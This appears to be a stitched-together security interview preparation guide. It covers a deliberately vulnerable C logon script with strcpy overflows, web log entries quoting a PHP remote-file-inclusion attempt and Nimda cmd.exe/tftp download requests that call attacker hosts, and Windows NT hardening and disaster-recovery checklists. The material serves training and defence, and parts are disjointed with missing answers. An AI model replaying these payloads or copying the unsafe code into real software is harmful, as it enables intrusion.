Vital Computer security Interview Preparation Guide

Download PDF

One way to make it harder for the local user to do any harm to the system is to have a local PC without any hard disk or floppy disk. To boot, the system will need to talk to a boot server over the network.

You have been asked to review the source code for a compiled script that is being used to validate logon credentials for a web application. The file is called "logon_validate" and a typical logon request looks like this –

"GET /cgi-bin/logon_validate?login=test&password=test"

The source code is shown below –

void show_error(void) {

// AUTHENTICATION ERROR

exit(-1);

}

int main(int argc, char **argv) {
char error_on_auth='1';
char user[128];
char pass[128];
char *ch_ptr_begin;
char *ch_ptr_end;

/**********************************/
/* Get Username from Query String */
/**********************************/
ch_ptr_begin=(char *)strstr
(****QUERY_STRING****,"login=");
if (ch_ptr_begin==NULL)
show_error();
ch_ptr_begin+=6;
ch_ptr_end=(char *)strstr(ch_ptr_begin,"&");
if (ch_ptr_end==NULL)
show_error();
*(ch_ptr_end++)='';
strcpy(user,ch_ptr_begin);


/**********************************/
/* Get Password from Query String */
/**********************************/
ch_ptr_begin=(char *)strstr(ch_ptr_end,"password=");
if (ch_ptr_begin==NULL)
show_error();
ch_ptr_begin+=9;
ch_ptr_end=(char *)strstr(ch_ptr_begin,"&");
if (ch_ptr_end!=NULL) *(ch_ptr_end++)='';
strcpy(pass,ch_ptr_begin);


if ((strcmp(user,GOOD_USER)==0) &&
(strcmp(pass,GOOD_PASS)==0))
error_on_auth='0';

if (error_on_auth=='0') {

// AUTHENTICATION OK!!


} else {

// AUTHENTICATION ERROR
show_error();


}

// return(0); hehe could be evil ;PPPPP
exit(0);

}
This pseudo-code is taken from the NGSec Web Auth Games
http://quiz.ngsec.biz:8080/game1/level6/replicant.php

Do you see any problems with this script?
How could an attacker exploit this script to bypass
the authentication mechanisms in this script?
What are some mitigation options?




Note: Goal of question – This is most likely the most complex question being asked during the interview due to the fact that the applicant will need to apply multiple layers of analysis, including both the attacker and defender perspectives.

What application generated the log file entry below? What type of attack is this? Assuming the index.php program is vulnerable, was this attack successful?

========================================
Request: 200.158.8.207 - - [09/Oct/2004:19:40:46 --0400] "POST /index.php HTTP/1.1" 403 743
Handler: cgi-script
----------------------------------------
POST /index.php HTTP/1.1
Host: www.foo.com
Connection: keep-alive
Accept: */*
Accept-Language: en-us
Content-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla 4.0 (Linux)
Content-Length: 65
X-Forwarded-For: 200.158.8.207
mod_security-message: Access denied with code 403. Pattern match "unamex20-a" at POST_PAYLOAD
mod_security-action: 403

65
lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a
----------------------------------------



Note: Goal of question – to verify that the applicant can interpret various web log files, identify attacks and possible impacts. The Mod_Security Apache module generated this data in the audit_log file. The log entry indicates that an attacker is attempting to exploit a PHP file inclusion vulnerability in the index.php script. The commands being passed are in the POST PAYLOAD of the command. This attack was not successful for the following two reasons:

· The mod_security-message header indicates that Mod_Security blocked this request based on a converted Snort web-attack rule when it identified the "uname –a" data in the POST PAYLOAD.
· The attacker also made a typo in the OS commands being passed in the POST PAYLOAD. She did not include a semicolon ";" between the ls and uname commands. The target host would fail to execute the "lsuname" command.

Imagine that we are running an Apache reverse proxy server and one of the servers we are proxy for is a Windows IIS server. What does the log entry suggest has happened? What would you do in response to this entry?

68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/
cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-"
68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] "GET /c/winnt/system32/
cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 566 "-" "-"



Note: Goal of question – To see if the applicant is fluent at reading web server log files in the Common Log Format (CLF). In this scenario, the client system (68.48.142.117) is infected with the Nimda worm. These requests will not affect our Apache proxy server since this is a Microsoft vulnerability. While it does not impact Apache, the logs do indicate that the initial request was successful (status code of 200). The Nimda worm will only send the level 2 request (trying to use Trivial FTP to infect the target) if the initial request is successful. Depending on the exact proxying rules in place, it would be a good idea to inspect the internal IIS server to verify that it has not been compromised.
If you were not using Apache as the reverse proxy, what Microsoft application/tool could you use to mitigate this attack?
You could use either Microsoft's Internet and Security Acceleration (ISA) server as a front-end proxy or implement URLScan on the target IIS server. The urlscan.ini file has the AllowDotInPath directive which will block directory traversal attempts.

Note: Goal of question – Determine if the applicant utilizes computer security resources such as CERT, SANS Internet Storm Center or ICAT. Email lists such as securityfocus, bugtraq, SANS @RISK, etc. are also good resources. Recent examples of threats will vary depending on current events, but issues such as new web based worms (PHP Santy Worm) or applications, which are in wide use (awstats scripts) are acceptable.

The Microsoft Baseline Security Analyzer (MBSA) is a graphical and command-line interface developed by Microsoft that can perform local or remote scans of Windows systems, assessing any missing hotfixes and vulnerabilities in certain Microsoft products. See the Microsoft Baseline Security Analyzer page on TechNet for more information.

This tool is part of the IIS Lockdown Wizard and it works by turning off unnecessary features of the IIS server and thereby reducing the attack surface available to an attacker. This tool also works in conjunction with URLscan to provide multiple layers of defense and protection. See the IIS Lockdown Tool page on TechNet describes its features and characteristics as well as provides steps for download and setup.

Security is a huge concern for anyone involved in business processes, management, and administration. A good resource of information on maintaining security in Windows 2000 and IIS is the security section of the Windows 2000 site. Also see Internet Information Services (IIS) on the Microsoft TechNet site, where you can find information on securing IIS servers in addition to resources that will help you maintain a secure system and stay current with any releases, updates, and tools.

Server side includes, snippets of server directives embedded in HTML documents, are another potential hole. A subset of the directives available in server-side includes instruct the server to execute arbitrary system commands and CGI scripts. Unless the author is aware of the potential problems it's easy to introduce unintentional side effects. Unfortunately, HTML files containing dangerous server-side includes are seductively easy to write.

Some servers, including Apache and NCSA, allow the Web master to selectively disable the types of includes that can execute arbitrary commands.

Again, the answer is yes, although it would be foolhardy to give specific recommendations on this point. As a rule of thumb, the more features a server offers, the more likely it is to contain security holes. Simple servers that do little more than make static files available for requests are probably safer than complex servers that offer such features as on-the-fly directory listings, CGI script execution, server-side include processing, and scripted error handling.

Version 1.3 of NCSA's Unix server contains a serious known security hole. Discovered in March of 1995, this hole allows outsiders to execute arbitrary commands on the server host. If you have a version 1.3 httpd binary whose creation date is earlier than March 1995 don't use it! Replace it with the patched 1.3 server or with version 1.4 or higher (available at the same site). The Apache plug-in replacement for NCSA is also free of this bug.

Servers also vary in their ability to restrict browser access to individual documents or portions of the document tree. Some servers provide no restriction at all, while others allow you to restrict access to directories based on the IP address of the browser or to users who can provide the correct password. A few servers, primarily commercial ones (e.g. Netsite Commerce Server, Open Market), provide data encryption as well.

The WN server, by John Franks, deserves special mention in this regard because its design is distinctively different from other Web servers. While most servers take a permissive attitude to file distribution, allowing any document in the document root to be transferred unless it is specifically forbidden, WN takes a restrictive stance. The server will not transfer a file unless it has been explicitly placed on a list of allowed documents. On-the-fly directory listings and other "promiscuous" features are also disallowed.

There are basically three overlapping types of risk:

1. Bugs or misconfiguration problems in the Web server that allow unauthorized remote users to:
* Steal confidential documents not intended for their eyes.
* Execute commands on the server host machine, allowing them to modify the system.
* Gain information about the Web server's host machine that will allow them to break into the system.
* Launch denial-of-service attacks, rendering the machine temporarily unusable.

2. Browser-side risks, including:
* Active content that crashes the browser, damages the user's system, breaches the user's privacy, or merely creates an annoyance.
* The misuse of personal information knowingly or unkowingly provided by the end-user. 3. Interception of network data sent from browser to server or vice versa via network eavesdropping. Eavesdroppers can operate from any point on the pathway between browser and server including:
* The network on the browser's side of the connection.
* The network on the server's side of the connection (including intranets).
* The end-user's Internet service provider (ISP).
* The server's ISP.
* Either ISPs' regional access provider.

It's important to realize that "secure" browsers and servers are only designed to protect confidential information against network eavesdropping. Without system security on both browser and server sides, confidential documents are vulnerable to interception.

Protecting against network eavesdropping and system security are the subject of sections 1 to 5 of this document. Client-side security is covered in sections 6 and 7. Section 8 deals with security alerts for specific Web servers.

1. What is a firewall?

2. Describe, genrally, how to manage a firewall

3. What is a Denial of Service attack?
v 4. What is a “spoofed” packet?

5. What is a SYN Flood?

6. What do you do if you are a victim of a DoS?

7. What is GPG/PGP?

8. What is SSH?

9. What is SSL? How do you create certificates?

10. What would you do if you discovered a UNIX or Network device on your network has been compromised?

11. What would you do if you discovered a Windows system on your network has been comrpromised?

12. What is DNS Hijacking?

13. What is a log host?

14. What is IDS or IDP, and can you give me an example of one?

15. Why are proxy servers useful?

16. What is web-caching?

* Do we have a written disaster recovery plan?
o Are copies in possession of departmental management? At their homes?
* • When was our plan last updated?
* Does our plan include:
o A list of who in the department is empowered to declare a disaster? A list of critical personnel who will need to respond to a disaster?
--------- Telephone numbers (home, cell) for all critical personnel?
o An inventory of all our critical business functions?
o An inventory of the computer systems that support those functions?
------.. Including not only servers but critical desktop computers (e.g. departmental secretaries’ computers)?
o A rank-ordered list of which business functions we would restore first in event of a disaster?

* Suppose we had to evacuate the building due to a major disaster (fire, flood, chemical or biological event renders building inaccessible). Suppose all our systems are offline. How long would it take to restore basic departmental business functions and data from our offsite backup tapes?

* What confidential personal information (e.g., Social Security numbers) do we store on our servers? Do we minimize use of SSNs to the extent feasible? Could we use another identifier, such as MSU PID numbers instead?

o If we do need to store confidential data such as SSNs locally, how secure are the servers that house the information?
* Instead of storing personal confidential information locally, could we do business in some other way? Could we eliminate those confidential data elements from our local databases? Could we instead routinely access data as needed from University data services (thus obviating the need for the local copies)?
* Have all personnel within the unit been adequately trained in University data security requirements and applicable state or federal laws and regulations (e.g. FERPA, HIPAA, Gramm-Leach-Bliley Act)?

* Do we use hardware firewalls to protect critical servers and desktop computers?
o How often do we examine event logs and real-time displays to see if we are under attack?
o Do we use software firewalls to protect end-user computers (e.g. laptops that may spend time away from protection of the departmental hardware firewall)?
* Do we monitor the network for security exposures using auditing tools such as ISS, or Nessus?
* Do we monitor the network for unusual patterns of traffic? (E.g. a server or an end user computer suddenly begins emitting huge amounts of traffic.)
* Do we ensure that all critical business transactions take place using encrypted transmission? (E.g. SSL for Web or email transactions, SSH or VPN for remote login, encrypted file transfers)?

* • How often do we back up our servers? How often do we back up the desktop computers that we use for departmental business functions
o A common practice is weekly backups of all data, and daily backups of files or data that have changed.
* • What backup media do we use? Is hardware to read that media commonly available?
* • When did we last test our backup procedures to make sure data can be restored? <
* Are our backups in “image” format (requiring identical hardware or software to restore)? Could we load our backups into another system if need be?
* • Do we take backup tapes offsite? Where? How often?
* • How often do we back up end user desktops? Or is this the responsibility of end users

* Do we run anti-virus software? Which tool(s) do we use? o On all servers? On all critical desktops? o On all end user desktops?
* • Are our virus definitions current?
o How often are the definitions updated? (At least twice weekly is advised; many experts suggest daily updates.)
* • Do we run spyware detection software on our servers and on end user computers?
* • How are servers and end-user computers given new antivirus definitions? (From the vendor’s Web site, from a local server, or otherwise?)
* • Have we enabled automatic scanning for virus definition updates on servers and end-user computers?
* Do we scan incoming and outgoing email for viruses (as well as other modes of transmission)?
* Do we educate our users about virus avoidance (e.g. be wary of attachments in general, don’t run .EXE files sent via email, etc.)
* computers to install new software, so as to limit the capacity of viruses to install themselves? o E.g. using Microsoft’s Group Policy Option?

* When we acquire a new server or desktop computer, do we follow a defined set of procedures to set it up?

* How do we “lock down” a new system? Do we:
Turn on or install software firewalls? • And/or use a hardware firewall? o Turn off unnecessary services (e.g. FTP on a desktop computer that doesn’t need to support this protocol)? o Rename administrator user names as appropriate? Change default passwords? o Follow product-specific advice or expert checkists on how to secure new servers and applications? (For instance, software vendors and outside experts offer white papers or checklists on how to secure, for instance, a Windows XP workstation or a Linux server.)
* Do we test new systems for security using tools such as the Microsoft Baseline Security Analyzer, etc?

HKLMSECURITYPolicySecrets_SC_servicenameCurrVal contains the encrypted password of the service. The password is not machine or account dependent. i.e. a user foo with password bar in domain X in NT3.51 has the same encrypted value as user baz in domain Y with NT4.0 (with password bar).

Yes you can, but there is an error on the manual on how to do it. Check out Knowledge Base article Q142615 to see why the "Manage auditing and security log" privilege does not work as documented.

There are a number of things to do to get better security on remote connections

* Putting the RAS servers on one or more own interfaces in the firewall
* Be sure to turn on auditing for the RAS function
* Enable authentication
* Enable session encryption
* Enable dialback
* Specify which hours remote users are allowed

To turn on auditing for RAS, use the regedit utility to set the key

HKEY_LOCAL_MACHINESystemCurrentControlSetServicesRasManParametersLogging
to 1, then restart RAS.

When installing the complete SNA package, you will get at least three more services, AFTP, NVAlert and NVRunCmd.

* AFTP is like its TCP/IP counterpart FTP a tool to transfer files over the net. It might be used for anonymous logins as well.
* NVRunCmd is a service that lets someone running the NetView network monitoring tool send ordinary commands over the net that will be executed locally on the Windows NT machine.

Make sure that you have disabled these services if you want to run a more secure setup.

On the NT 4.0 CD-ROM there are a utility called rollback.exe that will corrupt your system if run. It is not intended for end-users, but someone slipped and the tool is now out on many users systems.

Without any sign of warning, rollback.exe will remove all system registry entries, which in turn will leave the system in a state where there are not easy way to recover. One have to grab the emergency repair disk and do a restore from the latest backup.

There are a number of problems with web servers. Bugs in the server, stupid CGI scripts, erroneous configurations, strange other services (e.g. data base connections) are just a few things that might be used to damage your security.

You might want to look at the WWW Security FAQ to get some general security information on WWW.

If you install an Windows NT machine as a web server or a firewall, you should tighten up the security on that box more that you should do to ordinary machines on your internal network since a machine accessible from the Internet are more vulnerable and more likely to be attacked. Securing the machine gives you a bastion host. Some of the things you should do include

* Remove all protocol stacks except TCP/IP, since IP is the only protocol that runs on the Internet
* Remove some network bindings
* Disable all unnecessary accounts, like guest
* Remove share permissions and default shares
* Remove network access for everyone (User Manger -> Policies -> User rights, "Access this computer from the network")
* Disable unnecessary services (FTP, etc)
* Enable audit logging
* Track the audit information